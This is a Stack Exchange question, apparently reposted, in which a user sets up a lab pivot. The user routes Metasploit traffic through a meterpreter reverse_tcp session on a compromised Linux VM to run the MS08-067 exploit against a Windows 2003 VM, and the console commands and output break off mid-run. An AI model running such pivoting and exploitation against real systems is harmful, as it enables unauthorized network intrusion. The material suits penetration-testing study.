Pivoting with Metasploit

Source: security.stackexchange.com --- Sunday, October 08, 2017
I am trying to exploit a Windows VM on a different subnet behind a dual home Linux VM where I already have a shell. To keep it simple, I have a meterpreter reverse_tcp shell on the Linux VM (192.168.47.144) and the Windows VM (192.168.128.133) is 2003 and vulnerable to MS08-067 (I tested this directly). Lastly, the Linux VM can definitely hit the SMB service on the Windows VM. ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445 192.168.47.144 Connection to 192.168.128.133 445 port [tcp/*] succeeded! The meterpreter reverse_tcp shell on the Linux VM connects back on port 5555 so there is not a conflict with port number. [*] Sending stage (826872 bytes) to 192.168.47.144 [*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500 msf exploit(handler) > use exploit/Windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2 [*] Route added msf exploit(ms08_067_netapi) > route IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 192.168.128.0 255.255.255.0 Session 2 [*] There are currently no IPv6 routes defined. msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133 RHOST => 192.168.128.133 msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.47.136:4444 [*] 192.168.128.133:445 - Automatically detecting the target... [*] 192.168.128.133:445 ...

from Windows http://ift.tt/2g2KPIo